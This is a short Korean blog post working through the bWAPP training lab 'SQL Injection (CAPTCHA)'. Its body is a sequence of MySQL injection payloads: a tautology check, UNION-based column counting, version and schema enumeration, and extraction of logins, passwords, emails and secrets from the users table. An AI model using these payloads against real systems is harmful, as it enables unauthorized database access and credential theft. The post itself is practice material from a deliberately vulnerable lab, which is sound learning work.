bWAPP 17. SQL Injection (CAPTCHA)

Web hacking|2022. 2. 10. 01:58

                                           SQL Injection ( CAPTCHA)

-Ptod7 을 입력하니

해당 창이 나오게 된다.

 

 

[ 공격 가능 확인 ]

입력 값 : ' or 1=1#

 

 

 

 

 

 

 

 

 

 

[ 컬럼 수 확인 ]

입력 값 : ' union select all 1,2,3,4,5,6,7#

 

 

 

 

 

 

[ 버전 확인 ]

입력 값 : ' union select all 1,@@version,database(),4,5,6,7#

 

 

 

 

 

[ 테이블 확인하기 ]

 

 

입력 값 :  ' UNION SELECT ALL 1, table_name,3,4,5,6,7 from information_schema.tables#

 

 

 

 

 

 

 

[ user 테이블 컬럼 추출 ]

 

입력 값 :  ' UNION SELECT ALL 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#

 

 

 

 

 

 

 

[ user 테이블의 컬럼 내용 확인 ]

 

 

입력 값 :  0' union select all 1, concat(id,login),password,email,secret,6,7 from users#

 

 

 

 

                          

저작자표시 비영리 변경금지

'Web hacking' 카테고리의 다른 글

bWAPP 18.SQL Injection (Login Form/Hero)  (0) 2022.02.11
bWAPP 16. SQL Injection (AJAX JSON jQuery)  (0) 2022.02.10
bWAPP 15. SQL Injection (POST Select)  (0) 2022.02.07
bWAPP 14. SQL Injection (POST Search)  (0) 2022.02.06
bWAPP 13. SQL Injection (GET/Select)  (0) 2022.02.06

댓글()

티스토리툴바